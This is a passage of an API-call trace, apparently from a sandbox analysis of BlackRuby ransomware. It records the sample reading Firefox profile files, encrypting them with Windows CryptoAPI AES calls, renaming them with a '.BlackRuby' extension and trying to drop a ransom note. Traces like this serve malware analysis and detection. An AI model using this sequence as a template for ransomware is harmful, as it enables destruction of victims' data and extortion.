ftLastWriteTime.dwLowDateTime=0xcae85690, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0xf34d)) returned 1 [0049.815] GetLastError () returned 0x5 [0049.815] SetErrorMode (uMode=0x0) returned 0x1 [0049.815] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\d2ea1355d529838a6539b19e2bc342fe.png", nBufferLength=0x105, lpBuffer=0x18e6cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\d2ea1355d529838a6539b19e2bc342fe.png", lpFilePart=0x0) returned 0x78 [0049.815] GetLastError () returned 0x5 [0049.815] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\d2ea1355d529838a6539b19e2bc342fe.png", nBufferLength=0x105, lpBuffer=0x18e5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\d2ea1355d529838a6539b19e2bc342fe.png", lpFilePart=0x0) returned 0x78 [0049.815] GetLastError () returned 0x5 [0049.815] SetErrorMode (uMode=0x1) returned 0x0 [0049.815] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\d2ea1355d529838a6539b19e2bc342fe.png" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\thumbnails\\d2ea1355d529838a6539b19e2bc342fe.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.815] GetLastError () returned 0x0 [0049.815] GetFileType (hFile=0x184) returned 0x1 [0049.815] SetErrorMode (uMode=0x0) returned 0x1 [0049.815] GetFileType (hFile=0x184) returned 0x1 [0049.815] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eb54 | out: lpFileSizeHigh=0x18eb54*=0x0) returned 0xf34d [0049.815] GetLastError () returned 0x0 [0049.815] ReadFile (in: hFile=0x184, lpBuffer=0x1b996a4, nNumberOfBytesToRead=0xf34d, lpNumberOfBytesRead=0x18eafc, lpOverlapped=0x0 | out: lpBuffer=0x1b996a4*, lpNumberOfBytesRead=0x18eafc*=0xf34d, lpOverlapped=0x0) returned 1 [0049.825] GetLastError () returned 0x0 [0049.825] CloseHandle (hObject=0x184) returned 1 [0049.825] GetLastError () returned 0x0 [0049.825] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\d2ea1355d529838a6539b19e2bc342fe.png", nBufferLength=0x105, lpBuffer=0x18e6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\d2ea1355d529838a6539b19e2bc342fe.png", lpFilePart=0x0) returned 0x78 [0049.825] GetLastError () returned 0x0 [0049.825] SetErrorMode (uMode=0x1) returned 0x0 [0049.826] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\d2ea1355d529838a6539b19e2bc342fe.png" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\thumbnails\\d2ea1355d529838a6539b19e2bc342fe.png"), fInfoLevelId=0x0, lpFileInformation=0x18eb64 | out: lpFileInformation=0x18eb64*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc5d96a90, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0xcae5f530, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xcae85690, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0xf34d)) returned 1 [0049.826] GetLastError () returned 0x0 [0049.826] SetErrorMode (uMode=0x0) returned 0x1 [0049.826] CryptAcquireContextW (in: phProv=0x18eac4, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18eac4*=0x37c4e8) returned 1 [0049.826] GetLastError () returned 0x0 [0049.860] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1c121c8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18eaa0 | out: phKey=0x18eaa0*=0x360d20) returned 1 [0049.860] GetLastError () returned 0x0 [0049.860] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0049.860] GetLastError () returned 0x0 [0049.865] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0049.865] GetLastError () returned 0x0 [0049.865] CryptDuplicateKey (in: hKey=0x360d20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ea5c | out: phKey=0x18ea5c*=0x360fa0) returned 1 [0049.865] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0049.865] GetLastError () returned 0x0 [0049.865] CryptSetKeyParam (hKey=0x360fa0, dwParam=0x4, pbData=0x1c3f214*=0x1, dwFlags=0x0) returned 1 [0049.865] GetLastError () returned 0x0 [0049.865] CryptSetKeyParam (hKey=0x360fa0, dwParam=0x1, pbData=0x1c3f1e0, dwFlags=0x0) returned 1 [0049.865] GetLastError () returned 0x0 [0049.865] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c3f25c*, pdwDataLen=0x18eaec*=0xf440, dwBufLen=0xf440 | out: pbData=0x1c3f25c*, pdwDataLen=0x18eaec*=0xf440) returned 1 [0049.866] GetLastError () returned 0x0 [0049.866] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c5db08*, pdwDataLen=0x18eb04*=0x10, dwBufLen=0x10 | out: pbData=0x1c5db08*, pdwDataLen=0x18eb04*=0x10) returned 1 [0049.866] GetLastError () returned 0x0 [0049.866] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c5db38*, pdwDataLen=0x18eb0c*=0x0, dwBufLen=0x10 | out: pbData=0x1c5db38*, pdwDataLen=0x18eb0c*=0x10) returned 1 [0049.866] GetLastError () returned 0x0 [0049.867] CryptDestroyKey (hKey=0x360d20) returned 1 [0049.867] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0049.867] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0049.867] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\d2ea1355d529838a6539b19e2bc342fe.png", nBufferLength=0x105, lpBuffer=0x18e5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\d2ea1355d529838a6539b19e2bc342fe.png", lpFilePart=0x0) returned 0x78 [0049.867] GetLastError () returned 0x0 [0049.867] SetErrorMode (uMode=0x1) returned 0x0 [0049.867] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\d2ea1355d529838a6539b19e2bc342fe.png" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\thumbnails\\d2ea1355d529838a6539b19e2bc342fe.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.868] GetLastError () returned 0xb7 [0049.868] GetFileType (hFile=0x184) returned 0x1 [0049.868] SetErrorMode (uMode=0x0) returned 0x1 [0049.868] GetFileType (hFile=0x184) returned 0x1 [0049.870] CloseHandle (hObject=0x184) returned 1 [0049.870] GetLastError () returned 0xb7 [0049.870] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\d2ea1355d529838a6539b19e2bc342fe.png", nBufferLength=0x105, lpBuffer=0x18e6cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\d2ea1355d529838a6539b19e2bc342fe.png", lpFilePart=0x0) returned 0x78 [0049.870] GetLastError () returned 0xb7 [0049.870] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\Encrypted_CMIaWqxshTzk6tbQcti2QUnyRMQskRzOzfqE0kUQe.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e6cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\Encrypted_CMIaWqxshTzk6tbQcti2QUnyRMQskRzOzfqE0kUQe.BlackRuby", lpFilePart=0x0) returned 0x91 [0049.870] GetLastError () returned 0xb7 [0049.870] SetErrorMode (uMode=0x1) returned 0x0 [0049.870] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\d2ea1355d529838a6539b19e2bc342fe.png" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\thumbnails\\d2ea1355d529838a6539b19e2bc342fe.png"), fInfoLevelId=0x0, lpFileInformation=0x18eb4c | out: lpFileInformation=0x18eb4c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc5d96a90, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0xcae5f530, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x25ed3d40, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0xf450)) returned 1 [0049.870] GetLastError () returned 0xb7 [0049.870] SetErrorMode (uMode=0x0) returned 0x1 [0049.871] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\d2ea1355d529838a6539b19e2bc342fe.png" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\thumbnails\\d2ea1355d529838a6539b19e2bc342fe.png"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\Encrypted_CMIaWqxshTzk6tbQcti2QUnyRMQskRzOzfqE0kUQe.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\thumbnails\\encrypted_cmiawqxshtzk6tbqcti2qunyrmqskrzozfqe0kuqe.blackruby")) returned 1 [0049.871] GetLastError () returned 0xb7 [0049.871] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x6c [0049.871] GetLastError () returned 0xb7 [0049.871] SetErrorMode (uMode=0x1) returned 0x0 [0049.871] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\thumbnails\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0049.871] GetLastError () returned 0x5 [0049.872] SetErrorMode (uMode=0x0) returned 0x1 [0049.872] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates", nBufferLength=0x105, lpBuffer=0x18e8bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates", lpFilePart=0x0) returned 0x2e [0049.872] GetLastError () returned 0x5 [0049.872] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0049.872] GetLastError () returned 0x5 [0049.872] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0049.872] GetLastError () returned 0x5 [0049.872] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates", nBufferLength=0x105, lpBuffer=0x18e794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates", lpFilePart=0x0) returned 0x2e [0049.872] GetLastError () returned 0x5 [0049.872] SetErrorMode (uMode=0x1) returned 0x0 [0049.872] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360d20 [0049.873] GetLastError () returned 0x5 [0049.873] FindNextFileW (in: hFindFile=0x360d20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.873] GetLastError () returned 0x5 [0049.873] FindNextFileW (in: hFindFile=0x360d20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.873] GetLastError () returned 0x5 [0049.873] FindNextFileW (in: hFindFile=0x360d20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.873] GetLastError () returned 0x12 [0049.873] FindClose (in: hFindFile=0x360d20 | out: hFindFile=0x360d20) returned 1 [0049.873] SetErrorMode (uMode=0x0) returned 0x1 [0049.873] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates", nBufferLength=0x105, lpBuffer=0x18e794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates", lpFilePart=0x0) returned 0x2e [0049.873] GetLastError () returned 0x12 [0049.873] SetErrorMode (uMode=0x1) returned 0x0 [0049.873] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360d20 [0049.873] GetLastError () returned 0x12 [0049.874] FindNextFileW (in: hFindFile=0x360d20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.874] GetLastError () returned 0x12 [0049.874] FindNextFileW (in: hFindFile=0x360d20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.874] GetLastError () returned 0x12 [0049.874] FindNextFileW (in: hFindFile=0x360d20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.874] GetLastError () returned 0x12 [0049.874] FindClose (in: hFindFile=0x360d20 | out: hFindFile=0x360d20) returned 1 [0049.874] SetErrorMode (uMode=0x0) returned 0x1 [0049.874] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB", nBufferLength=0x105, lpBuffer=0x18e850, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB", lpFilePart=0x0) returned 0x3f [0049.874] GetLastError () returned 0x12 [0049.874] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0049.874] GetLastError () returned 0x12 [0049.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e774, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0049.874] GetLastError () returned 0x12 [0049.874] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB", nBufferLength=0x105, lpBuffer=0x18e728, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB", lpFilePart=0x0) returned 0x3f [0049.874] GetLastError () returned 0x12 [0049.874] SetErrorMode (uMode=0x1) returned 0x0 [0049.874] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360d20 [0049.880] GetLastError () returned 0x12 [0049.880] FindNextFileW (in: hFindFile=0x360d20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.881] GetLastError () returned 0x12 [0049.881] FindNextFileW (in: hFindFile=0x360d20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.881] GetLastError () returned 0x12 [0049.881] FindNextFileW (in: hFindFile=0x360d20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.881] GetLastError () returned 0x12 [0049.881] FindNextFileW (in: hFindFile=0x360d20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.881] GetLastError () returned 0x12 [0049.881] FindNextFileW (in: hFindFile=0x360d20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.881] GetLastError () returned 0x12 [0049.881] FindClose (in: hFindFile=0x360d20 | out: hFindFile=0x360d20) returned 1 [0049.882] SetErrorMode (uMode=0x0) returned 0x1 [0049.882] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB", nBufferLength=0x105, lpBuffer=0x18e728, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB", lpFilePart=0x0) returned 0x3f [0049.882] GetLastError () returned 0x12 [0049.882] SetErrorMode (uMode=0x1) returned 0x0 [0049.882] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360d20 [0049.883] GetLastError () returned 0x12 [0049.883] FindNextFileW (in: hFindFile=0x360d20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.883] GetLastError () returned 0x12 [0049.883] FindNextFileW (in: hFindFile=0x360d20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.883] GetLastError () returned 0x12 [0049.883] FindNextFileW (in: hFindFile=0x360d20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.883] GetLastError () returned 0x12 [0049.883] FindNextFileW (in: hFindFile=0x360d20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.883] GetLastError () returned 0x12 [0049.883] FindNextFileW (in: hFindFile=0x360d20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.883] GetLastError () returned 0x12 [0049.884] FindClose (in: hFindFile=0x360d20 | out: hFindFile=0x360d20) returned 1 [0049.884] SetErrorMode (uMode=0x0) returned 0x1 [0049.884] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\active-update.xml", nBufferLength=0x105, lpBuffer=0x18e7dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\active-update.xml", lpFilePart=0x0) returned 0x51 [0049.884] GetLastError () returned 0x12 [0049.884] SetErrorMode (uMode=0x1) returned 0x0 [0049.884] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\active-update.xml" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\updates\\308046b0af4a39cb\\active-update.xml"), fInfoLevelId=0x0, lpFileInformation=0x1c8d6e4 | out: lpFileInformation=0x1c8d6e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9cb9000, ftCreationTime.dwHighDateTime=0x1d2fb2f, ftLastAccessTime.dwLowDateTime=0xc0b9cc0, ftLastAccessTime.dwHighDateTime=0x1d2fb2f, ftLastWriteTime.dwLowDateTime=0xc0b9cc0, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x464)) returned 1 [0049.885] GetLastError () returned 0x12 [0049.885] SetErrorMode (uMode=0x0) returned 0x1 [0049.885] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\active-update.xml", nBufferLength=0x105, lpBuffer=0x18e7a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\active-update.xml", lpFilePart=0x0) returned 0x51 [0049.885] GetLastError () returned 0x12 [0049.885] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\active-update.xml", nBufferLength=0x105, lpBuffer=0x18e678, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\active-update.xml", lpFilePart=0x0) returned 0x51 [0049.885] GetLastError () returned 0x12 [0049.885] SetErrorMode (uMode=0x1) returned 0x0 [0049.885] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\active-update.xml" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\updates\\308046b0af4a39cb\\active-update.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.886] GetLastError () returned 0x0 [0049.886] GetFileType (hFile=0x184) returned 0x1 [0049.886] SetErrorMode (uMode=0x0) returned 0x1 [0049.886] GetFileType (hFile=0x184) returned 0x1 [0049.886] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ec2c | out: lpFileSizeHigh=0x18ec2c*=0x0) returned 0x464 [0049.886] GetLastError () returned 0x0 [0049.886] ReadFile (in: hFile=0x184, lpBuffer=0x1c8f8a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ebd4, lpOverlapped=0x0 | out: lpBuffer=0x1c8f8a8*, lpNumberOfBytesRead=0x18ebd4*=0x464, lpOverlapped=0x0) returned 1 [0049.891] GetLastError () returned 0x0 [0049.892] CloseHandle (hObject=0x184) returned 1 [0049.892] GetLastError () returned 0x0 [0049.892] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\active-update.xml", nBufferLength=0x105, lpBuffer=0x18e788, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\active-update.xml", lpFilePart=0x0) returned 0x51 [0049.892] GetLastError () returned 0x0 [0049.892] SetErrorMode (uMode=0x1) returned 0x0 [0049.892] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\active-update.xml" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\updates\\308046b0af4a39cb\\active-update.xml"), fInfoLevelId=0x0, lpFileInformation=0x18ec3c | out: lpFileInformation=0x18ec3c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9cb9000, ftCreationTime.dwHighDateTime=0x1d2fb2f, ftLastAccessTime.dwLowDateTime=0xc0b9cc0, ftLastAccessTime.dwHighDateTime=0x1d2fb2f, ftLastWriteTime.dwLowDateTime=0xc0b9cc0, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x464)) returned 1 [0049.892] GetLastError () returned 0x0 [0049.892] SetErrorMode (uMode=0x0) returned 0x1 [0049.892] CryptAcquireContextW (in: phProv=0x18eb9c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18eb9c*=0x37c790) returned 1 [0049.892] GetLastError () returned 0x0 [0049.924] CryptImportKey (in: hProv=0x37c790, pbData=0x1ceb10c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18eb78 | out: phKey=0x18eb78*=0x360ce0) returned 1 [0049.924] GetLastError () returned 0x0 [0049.924] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0049.924] GetLastError () returned 0x0 [0049.929] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0049.929] GetLastError () returned 0x0 [0049.929] CryptDuplicateKey (in: hKey=0x360ce0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eb34 | out: phKey=0x18eb34*=0x360ea0) returned 1 [0049.929] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0049.929] GetLastError () returned 0x0 [0049.929] CryptSetKeyParam (hKey=0x360ea0, dwParam=0x4, pbData=0x1d18158*=0x1, dwFlags=0x0) returned 1 [0049.929] GetLastError () returned 0x0 [0049.929] CryptSetKeyParam (hKey=0x360ea0, dwParam=0x1, pbData=0x1d18124, dwFlags=0x0) returned 1 [0049.929] GetLastError () returned 0x0 [0049.929] CryptEncrypt (in: hKey=0x360ea0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d181a0*, pdwDataLen=0x18ebc4*=0x560, dwBufLen=0x560 | out: pbData=0x1d181a0*, pdwDataLen=0x18ebc4*=0x560) returned 1 [0049.929] GetLastError () returned 0x0 [0049.929] CryptEncrypt (in: hKey=0x360ea0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d18c8c*, pdwDataLen=0x18ebdc*=0x10, dwBufLen=0x10 | out: pbData=0x1d18c8c*, pdwDataLen=0x18ebdc*=0x10) returned 1 [0049.929] GetLastError () returned 0x0 [0049.930] CryptEncrypt (in: hKey=0x360ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d18cbc*, pdwDataLen=0x18ebe4*=0x0, dwBufLen=0x10 | out: pbData=0x1d18cbc*, pdwDataLen=0x18ebe4*=0x10) returned 1 [0049.930] GetLastError () returned 0x0 [0049.930] CryptDestroyKey (hKey=0x360ce0) returned 1 [0049.930] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0049.930] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0049.930] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\active-update.xml", nBufferLength=0x105, lpBuffer=0x18e680, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\active-update.xml", lpFilePart=0x0) returned 0x51 [0049.930] GetLastError () returned 0x0 [0049.930] SetErrorMode (uMode=0x1) returned 0x0 [0049.930] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\active-update.xml" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\updates\\308046b0af4a39cb\\active-update.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.931] GetLastError () returned 0xb7 [0049.931] GetFileType (hFile=0x184) returned 0x1 [0049.931] SetErrorMode (uMode=0x0) returned 0x1 [0049.931] GetFileType (hFile=0x184) returned 0x1 [0049.932] CloseHandle (hObject=0x184) returned 1 [0049.932] GetLastError () returned 0xb7 [0049.932] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\active-update.xml", nBufferLength=0x105, lpBuffer=0x18e7a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\active-update.xml", lpFilePart=0x0) returned 0x51 [0049.932] GetLastError () returned 0xb7 [0049.932] GetFullPathNameW (in: 